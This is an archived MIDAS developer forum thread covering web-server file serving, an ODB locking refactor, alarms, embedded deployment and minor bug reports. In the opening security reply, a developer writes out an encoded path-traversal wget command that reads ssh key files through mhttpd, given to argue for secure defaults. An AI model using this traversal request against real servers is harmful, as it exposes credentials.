> I still strongly believe that mhttpd should not serve arbitrary files (only serve files explicitly listed in ODB) or as next best option,
> only serve files from subdirectories explicitly listed in ODB.
> 
> If people have access to the ODB, the can put the directory /etc/ into the ODB and again read that way /etc/passwd.
>

I suggest a more practical approach.

The default configuration should be secure (not serve /etc/passwd and .ssh/id_rsa.pub right out of the box). If users change things,
it is their business, we have to trust them to know what they are doing.

Still we should protect them from trivial security mistakes. Here is an example. Right now we set ODB /Custom/Path to $MIDASSYS,
which is often "$HOME/packages/midas" or "$HOME/git/midas". In this case, the following command will steal the ssh
private key:  "wget http://localhost:8080/%2e%2e/%2e%2e/.ssh/authorized_keys". (this will not work in the google chrome url bar,
as it replaces "%2e%2e" with ".." then normalizes "/.." to "/"). BTW, I do not know all and every way to obfuscate ".." in order
to escape from a file path jail. Maybe I should see what apache httpd people do against escapes from a file path jail.

Most important is to clearly explain which files we serve from which URLs. If we are upfront that we serve all and any files
with file names in the form ("/Custom/Path" + URL), they make have a clue to not set "/Custom/Path" to blank or "/". On our side,
obviously /Custom/Path set to "" should not mean that we serve any and all files with filenames that can be encoded into a URL.

K.O.

P.S. All this only reinforces my opinion that mhttpd should not be exposed directly to the internet (or even worse,
to a university campus network). Safest is to place it behind a password-protected https proxy and hope the password
is not leaked (hello, browser "save password/show password" button!) and is strong enough against
guessing or brute force attack. (hello, password midas/midas!).

K.O.
Entry  05 Dec 2018, Konstantin Olchanski, Info, Partial refactoring of ODB code 
The current ODB code has several structural problems and I think I now figured out how to straighten them out.

Here is the problems:

a) nested (recursive) odb locks
b) no clear separation between read-only access and read-write access
c) no clear separation between odb validation and repair functions
d) cm_msg() is called while holding a database lock

Discussion:

a) odb locks are nested because most functions lock the database, then call other functions that lock the database again. Most locking primitives - SystemV 
semaphores, POSIX semaphores and mutexes - usually do not permit nested (recursive) locking.

For locking the odb shared memory we use a SystemV semaphore with recursion implemented "by hand" in ss_semaphore_wait_for(). This works ok.

For making odb thread-safe, we use POSIX mutexes, and we rely on an optional feature (PTHREAD_MUTEX_RECURSIVE) which seems to work on most OSes, but 
is not required to exist and work by any standard. For example, recursive mutexes do not work in uclinux (linux for machines without an MMU).

I looked at implementing recursive mutexes "by hand", same as we have the recursive semaphores, and realized that it is quite complicated and computationally 
expensive (read: inefficient). (Also I think nested and recursive locks is "not mainstream" and should rather be avoided). As an example you can see full 
complexity of a nested lock as recent implementation in ROOT. (good luck finding it).

A solution for this problem is well known. All functions are separated into "unlocked" user-callable functions and "locked" internal functions. Nested locking is 
naturally eliminated.

Call sequences:
db_get_key() -> db_find_key() // odb is locked twice
become
db_get_key() -> db_get_key_locked() -> db_find_key_locked() // odb is locked once

Actual implementation of this scheme turns out to be a very clean and mechanical refactoring (moving the code without changing what it does).

As a try, I refactored db_find_key() and db_get_key() and I like the result. Locking is now obvious - obscure error paths with hidden "unlock before return"  - are all 
gone. Extra conversions between hDB and pheader are gone.

b) in this refactoring, functions that do not (should not) modify odb become easy to identify - the pheader argument is tagged "const".

This simplifies the implementation of "write-protected" odb - instead of ad-hoc db_allow_write_locked() sprinkled everywhere, one can have obvious calls to 
"db_lock_read_only()" and "db_lock_read_write()".

Separation of locks into "read" and "write" locks, in turn, improves locking behaviour - helps against problems like lock starvation - which we did see with MIDAS - 
as "read" locks are much more efficient - all readers can read the data at the same time, locking is only done when somebody need to "write".

c) some db_validate() functions also try to do repair. this cannot work if validation is called from "read-only" functions like db_find_key(). I now think the "repair" 
functions should be separate from "validate" functions. validate functions should detect problems, repair functions would repair them. The question remains - 
when is good time to run a full repair. (probably at the time when we connect to the database - this way, simply starting "odbedit" will force a database check and 
repair).

d) calls to cm_msg() when odb is locked has been a problem for a long time. because cm_msg() itself calls odb and because it also calls event buffer code 
(SYSMSG buffer) which in turn call odb functions, there was trouble with deadlocks between ODB and event buffer semaphores, trouble with recursive use of 
ODB, etc.

Right now we have all this partially papered over by having cm_msg() put messages into a memory buffer that we periodically flush, but I was never super happy 
with that solution. For example, if we crash before the message buffer is flushed, all error messages are lost, they do not go into midas.log, they are not printed on 
the screen, they are not accessible in the core dump.

To resolve this problem, I have all "locked" functions call db_msg() instead of cm_msg(). db_msg() saves the messages in a linked list which is flushed into 
cm_msg() immediately after we unlock odb.

If we crash after generating an error message but before it is flushed to cm_msg(), we can still access it through the linked list inside the core dump. This is an 
improvement over what we have now. Ideally, all messages should be printed to the terminal and saved to midas.log and pushed into SYSMSG, but most of this is 
impractical at a moment when odb is locked - as we already know it leads to deadlocks and other trouble...

Bottom line, I now have a path to improve the odb code and to resolve some of the long standing structural problems.

K.O.
    Reply  11 Dec 2018, Stefan Ritt, Info, Partial refactoring of ODB code 
All makes sense to me. I agree to proceed with the refactoring.

One additional comment: In the 90's when I developed this code, locking was expensive. On a decent computer you could do a couple of thousand lock operations per second before you hit the 100% 
CPU limit. Therefore I tried to reduce the number of lock operation as much as possible. Like a db_find_key locks the ODB once and then goes through all keys before it unlocks again. If I would lock for 
every key and have an ODB with ten thousands of keys, that would have taken very long in the old days. 

Now the world has changed, we can do almost a million locks a second. So a db_get_record() does not have to obtain a whole directory in one go, but can get each value separately, and if necessary lock 
the ODB on each key access. This would be slower, but only a negligible amount these days. So in the spirit of making midas more robust, we can even go a step beyond simple refactoring and change the 
locking scheme if it becomes more transparent and stable.

Best,
Stefan
       Reply  26 Dec 2018, Konstantin Olchanski, Info, Partial refactoring of ODB code 
> One additional comment: In the 90's when I developed this code, locking was expensive.
> Now the world has changed, we can do almost a million locks a second.

I am not sure this is quite true. The CPU can execute 3000 million operations per second (3GHz CPU, assuming 1 op/Hz),
so 1 lock operation is worth 3000 normal operations. Of course cache misses and branch mispredictions mess up
this simple arithmetic...

But I think cost of mutex lock/unlock can be easily measured. (hmm... now I am curious).

Bigger question is architectural, nested/recursive locks is definitely a bad thing to do (not just my opinion).

But closer to home, as I implemented "write protected" ODB, lock/unlock suddenly has to do MMU operations
(map unmap memory) and this is *very* expensive.

Also as we start doing more multithreading, lock contention is becoming a problem, and the standard solution
is to implement read-locks and write-locks. (everybody holding a read-lock can read ODB at the same time
without waiting).

So, moving in the direction of separate read and write locks and write-protected (and/or read-protected) ODB shared memory,
all points in the direction of reworking of ODB locks in the direction of removing the need for nested/recursive locks.

I think me and Stefan are in agreement here.

K.O.
          Reply  27 Dec 2018, Stefan Ritt, Info, Partial refactoring of ODB code 
> I am not sure this is quite true. The CPU can execute 3000 million operations per second (3GHz CPU, assuming 1 op/Hz),
> so 1 lock operation is worth 3000 normal operations. Of course cache misses and branch mispredictions mess up
> this simple arithmetic...

You can try that with "t1" in odbedit. This times the number of db_get_data() calls midas can do per second. On my MacBook Pro I get 470'000 
accesses per second.
Entry  24 Sep 2018, Lars Martin, Suggestion, Self-resetting alarm class 
I was planning to use the alarm system to display an information banner when a
certain valve is open, but I would like it to go away again when the valve is
closed.
Is there a way to achieve that? Maybe reset the alarm from an alarm script?
(Seems like a hack...)
Maybe this could be a useful feature, to be able to define an alarm class that
resets itself once the condition is no longer met?
    Reply  24 Sep 2018, Lukas Gerritzen, Suggestion, Self-resetting alarm class 
If you run an external script anyway, you can also call "odbedit -c alarm" to
reset all alarms. Or you could try to set the "Triggered" entry of that certain
alarm to 0 (again, with odbedit), that could also work.
       Reply  25 Sep 2018, Stefan Ritt, Suggestion, Self-resetting alarm class 
> If you run an external script anyway, you can also call "odbedit -c alarm" to
> reset all alarms. Or you could try to set the "Triggered" entry of that certain
> alarm to 0 (again, with odbedit), that could also work.

That would not really help, because you cannot trigger a script AFTER an alarm occurred. Having 
"self-resetting" alarms is actually not a bad idea. I could add a flag "Auto reset" which is false by 
default and can be set to true for this functionality. Will keep that in mind for the next 
development cycle.

Stefan
          Reply  26 Dec 2018, Konstantin Olchanski, Suggestion, Self-resetting alarm class 
> > If you run an external script anyway, you can also call "odbedit -c alarm" to
> > reset all alarms. Or you could try to set the "Triggered" entry of that certain
> > alarm to 0 (again, with odbedit), that could also work.
> 
> That would not really help, because you cannot trigger a script AFTER an alarm occurred. Having 
> "self-resetting" alarms is actually not a bad idea. I could add a flag "Auto reset" which is false by 
> default and can be set to true for this functionality. Will keep that in mind for the next 
> development cycle.
> 

I second, this is a good idea. Sometimes I want "sticky" alarms that stay on to indicate that a bad thing happened in the 
past, sometimes I want self-resetting alarms that go away when a bad thing turns back into a good thing.

When I do this in a frontend, I manually trigger the alarm and manually clear the alarm, i.e. you can see this
done in ~addaq/online/src/fectrl.cxx

Use al_trigger_alarm() and al_reset_alarm().

This can also be done through the json-rpc interface - both calls are available as rpc commands - and so easy to use 
from javascript. (but there is no simple unix command line tool to issue json-rpc requests. ouch. must write one now.)

K.O.
    Reply  25 Sep 2018, Stefan Ritt, Suggestion, Self-resetting alarm class 
> I was planning to use the alarm system to display an information banner when a
> certain valve is open, but I would like it to go away again when the valve is
> closed.
> Is there a way to achieve that? Maybe reset the alarm from an alarm script?
> (Seems like a hack...)
> Maybe this could be a useful feature, to be able to define an alarm class that
> resets itself once the condition is no longer met?

Actually you can implement such a thing already now pretty quickly using custom javascript on 
the status page. Just read the valve state regularly from the ODB and dynamically modify the 
status page to show or hide a banner. Look how custom pages work in midas and try to apply 
this to the status page status.html which you find in the resources directory.

Stefan
Entry  24 Sep 2018, Devin Burke, Forum, Implementing MIDAS on a Satellite 
Hello Everybody,

I am a member of a satellite team with a scientific payload and I am considering
coordinating the payload using MIDAS. This looks to be challenging since MIDAS
would be implemented on an Xilinx Spartan 6 FPGA with minimal hardware
resources. The idea would be to install a soft processor on the Spartan 6 and
run MIDAS through UCLinux either on the FPGA or boot it from SPI Flash. Does
anybody have any comments on how feasible this would be or perhaps have
experience implementing a similar system?

-Devin
    Reply  25 Sep 2018, Stefan Ritt, Forum, Implementing MIDAS on a Satellite 
> Hello Everybody,
> 
> I am a member of a satellite team with a scientific payload and I am considering
> coordinating the payload using MIDAS. This looks to be challenging since MIDAS
> would be implemented on an Xilinx Spartan 6 FPGA with minimal hardware
> resources. The idea would be to install a soft processor on the Spartan 6 and
> run MIDAS through UCLinux either on the FPGA or boot it from SPI Flash. Does
> anybody have any comments on how feasible this would be or perhaps have
> experience implementing a similar system?
> 
> -Devin

While some people successfully implemented a midas *client* in an FPGA softcore, the full midas 
backend would probably not fit into a Spartan 6. Having done some FPGA programming and 
working on satellites, I doubt that midas would be well suited for such an environment. It's 
probably some kind of overkill. The complete GUI is likely useless since you want to minimize your 
communication load on the satellite link.

Stefan
       Reply  25 Sep 2018, Devin Burke, Forum, Implementing MIDAS on a Satellite 
> > Hello Everybody,
> > 
> > I am a member of a satellite team with a scientific payload and I am considering
> > coordinating the payload using MIDAS. This looks to be challenging since MIDAS
> > would be implemented on an Xilinx Spartan 6 FPGA with minimal hardware
> > resources. The idea would be to install a soft processor on the Spartan 6 and
> > run MIDAS through UCLinux either on the FPGA or boot it from SPI Flash. Does
> > anybody have any comments on how feasible this would be or perhaps have
> > experience implementing a similar system?
> > 
> > -Devin
> 
> While some people successfully implemented a midas *client* in an FPGA softcore, the full midas 
> backend would probably not fit into a Spartan 6. Having done some FPGA programming and 
> working on satellites, I doubt that midas would be well suited for such an environment. It's 
> probably some kind of overkill. The complete GUI is likely useless since you want to minimize your 
> communication load on the satellite link.
> 
> Stefan

Thank you for your comment Stefan. We do have some hardware resources on the board such as RAM, ROM and
Flash storage so we wouldn't necessarily have to virtualize everything. Ideally we would like a
completed and compressed file to be produced on board and regularly sent back to ground without
requiring remote access. MIDAS is appealing to us because its easily automated but we wouldn't
necessarily need functions like a GUI or web interface. Part of the discussion now is whether or not a
microblaze processor would be sufficient or if we need a dedicted ARM processor.

Devin 
          Reply  26 Dec 2018, Konstantin Olchanski, Forum, Implementing MIDAS on a Satellite 
> 
> Thank you for your comment Stefan. We do have some hardware resources on the board such as RAM, ROM and
> Flash storage so we wouldn't necessarily have to virtualize everything. Ideally we would like a
> completed and compressed file to be produced on board and regularly sent back to ground without
> requiring remote access. MIDAS is appealing to us because its easily automated but we wouldn't
> necessarily need functions like a GUI or web interface. Part of the discussion now is whether or not a
> microblaze processor would be sufficient or if we need a dedicted ARM processor.
> 

Hi, just recently I got a midas frontend to build and run on uclinux on a microblaze arm CPU (GRIFFIN CDM VME board).

It worked, but uncovered many problems inside midas - uclinux has no mmu, no multithreading, no recursive mutexes, no 
some of the other stuff assumed always available.

The worst problem I ran into was with uclinux giving us a very small stack so code like "int main() { char buf[10*1024]; }
crashes right away and there is a lot of code like this in midas.

My feeling about the xilinx soft-core CPU, if you can run uclinux, you can also run a midas frontend. We do not require 
memory beyond that needed to store one or two of your data events.

By design, the midas library can be built in a "minimal" configuration that only supports a frontend connected
to the mserver (no local ODB, no local event buffers, no local mhttpd/mlogger, etc).

As you have seen in the Makefile, there are provisions for cross-compilation and I cross-compile midas things quite often.

On the other side, if you have xilinx FPGA with build-in PowerPC CPU, most definitely you can run full linux
and you can run full midas on it, we have done this for the T2K/ND280 experiment in Japan.

K.O.
Entry  24 Oct 2018, Ryu Sawada, Info, bm_receive_event timeout in ROME 
Hi all

There is a bug report in the ROME repository which says bm_receive_event timeouts.

https://bitbucket.org/muegamma/rome3/issues/8/rome-with-midas-produces-timeout-after

Does anybody have any ideas what could causing the problem ?

Ryu
    Reply  26 Dec 2018, Konstantin Olchanski, Info, bm_receive_event timeout in ROME 
> There is a bug report in the ROME repository which says bm_receive_event timeouts.
> https://bitbucket.org/muegamma/rome3/issues/8/rome-with-midas-produces-timeout-after
> Does anybody have any ideas what could causing the problem ?

There could be a problem with causing bm_receive_event() to wait for an event for a time longer than 
the rpc timeout. This rings a very small bell for me. But I do not remember the details.

As I now go through the midas event buffer code, I will check that bm_receive_event() connected 
through the mserver has correctly working timeouts.

Thank you for reminding me about this difficulty.

K.O.
Entry  18 Dec 2018, Konstantin Olchanski, Info, mxml update 
the mxml library was updated to make it thread-safe.
https://bitbucket.org/tmidas/mxml/src/master/

I also take an opportunity to remind all to update your copy to the latest version
as I just stumbled on old bug that I fixed 1 year ago (crash of mlogger)
but forgot to update all and every of my copies of mxml.

I also looked at the xml encoder and I see that it has several places where it may
truncate the data, but none of these places can cause truncation of ODB data
because the fixed-size internal buffers are big enough to hold the longest
values sent by the odb xml encoder.

K.O.
Entry  30 Oct 2018, Joseph McKenna, Bug Report, Side panel auto-expands when history page updates 

One can collapse the side panel when looking at history pages with the button in
the top left, great! We want to see many pages so screen real estate is important

The issue we face is that when the page refreshes, the side panel expands. Can
we make the panel state more 'sticky'?

Many thanks
Joseph (ALPHA)

Version: 	2.1
Revision: 	Mon Mar 19 18:15:51 2018 -0700 - midas-2017-07-c-197-g61fbcd43-dirty
on branch feature/midas-2017-10
    Reply  31 Oct 2018, Stefan Ritt, Bug Report, Side panel auto-expands when history page updates 
> 
> 
> One can collapse the side panel when looking at history pages with the button in
> the top left, great! We want to see many pages so screen real estate is important
> 
> The issue we face is that when the page refreshes, the side panel expands. Can
> we make the panel state more 'sticky'?
> 
> Many thanks
> Joseph (ALPHA)
> 
> Version: 	2.1
> Revision: 	Mon Mar 19 18:15:51 2018 -0700 - midas-2017-07-c-197-g61fbcd43-dirty
> on branch feature/midas-2017-10

Hi Joseph,

In principle a page refresh should now not be necessary, since pages should reload automatically 
the contents which changes. If a custom page needs a reload, it is not well designed. If necessary, I 
can explain the details. 

Anyhow I implemented your "stickyness" of the side panel in the last commit to the develop branch.

Best regards,
Stefan
       Reply  31 Oct 2018, Joseph McKenna, Bug Report, Side panel auto-expands when history page updates 
> > 
> > 
> > One can collapse the side panel when looking at history pages with the button in
> > the top left, great! We want to see many pages so screen real estate is important
> > 
> > The issue we face is that when the page refreshes, the side panel expands. Can
> > we make the panel state more 'sticky'?
> > 
> > Many thanks
> > Joseph (ALPHA)
> > 
> > Version: 	2.1
> > Revision: 	Mon Mar 19 18:15:51 2018 -0700 - midas-2017-07-c-197-g61fbcd43-dirty
> > on branch feature/midas-2017-10
> 
> Hi Joseph,
> 
> In principle a page refresh should now not be necessary, since pages should reload automatically 
> the contents which changes. If a custom page needs a reload, it is not well designed. If necessary, I 
> can explain the details. 
> 
> Anyhow I implemented your "stickyness" of the side panel in the last commit to the develop branch.
> 
> Best regards,
> Stefan

Hi Stefan,

I apologise for miss using the word refresh. The re-appearing sidebar was also seen with the automatic
reload, I have implemented your fix here and it now works great!

Thank you very much!
Joseph
          Reply  02 Nov 2018, Stefan Ritt, Bug Report, Side panel auto-expands when history page updates 
> I apologise for miss using the word refresh. The re-appearing sidebar was also seen with the automatic
> reload, I have implemented your fix here and it now works great!

Still did not get your point. Why is there "automatic reload"? The status page should not "completely reload" any more. 
Instead, all data is fetched in the background using AJAX calls, and only the data on the page is updated once per second. If 
there is a "complete reload", something is wrong.

Stefan
             Reply  02 Nov 2018, Thomas Lindner, Bug Report, Side panel auto-expands when history page updates 
> > I apologise for miss using the word refresh. The re-appearing sidebar was also seen with the automatic
> > reload, I have implemented your fix here and it now works great!
> 
> Still did not get your point. Why is there "automatic reload"? The status page should not "completely reload" any more. 
> Instead, all data is fetched in the background using AJAX calls, and only the data on the page is updated once per second. 
If 
> there is a "complete reload", something is wrong.

Joseph's original message says that the problem is with the standard MIDAS history page, which currently use a complete reload 
when refreshing.  Of course we are planning to update this history pages to only grab what it needs (as well as changing the 
plotting to use newer HTML plotting). But until that upgrade happens your fix is helpful for the history page.
                Reply  02 Nov 2018, Stefan Ritt, Bug Report, Side panel auto-expands when history page updates 
> Joseph's original message says that the problem is with the standard MIDAS history page, which currently use a complete reload 
> when refreshing.  Of course we are planning to update this history pages to only grab what it needs (as well as changing the 
> plotting to use newer HTML plotting). But until that upgrade happens your fix is helpful for the history page.

Ok, now I understand, and of course I agree with you.

Stefan
Entry  11 Sep 2018, Francesco Renga, Forum, Launching an executable script from the sequencer 
Dear experts,
              is there any way to launch an executable script on the host computer from the MIDAS 
sequencer? If not, is there any interest to develop such a feature?

Thank you,
         Francesco
    Reply  11 Sep 2018, Pierre Gorel, Forum, Launching an executable script from the sequencer 
> Dear experts,
>               is there any way to launch an executable script on the host computer from the MIDAS 
> sequencer? If not, is there any interest to develop such a feature?
> 
> Thank you,
>          Francesco

The SCRIPT command will do that (on the machine running MIDAS). I know it works with either python or
bash scripts. I tried without success to pass the parameters and I went around by setting ODB entries
prior to running the script and then access to them within the script.
       Reply  11 Sep 2018, Stefan Ritt, Forum, Launching an executable script from the sequencer 
> > Dear experts,
> >               is there any way to launch an executable script on the host computer from the MIDAS 
> > sequencer? If not, is there any interest to develop such a feature?
> > 
> > Thank you,
> >          Francesco
> 
> The SCRIPT command will do that (on the machine running MIDAS). I know it works with either python or
> bash scripts. I tried without success to pass the parameters and I went around by setting ODB entries
> prior to running the script and then access to them within the script.

Passing parameters should work. If it's confirmed to be broken, I'm willing to fix it.

Stefan
ELOG V3.1.4-2e1708b5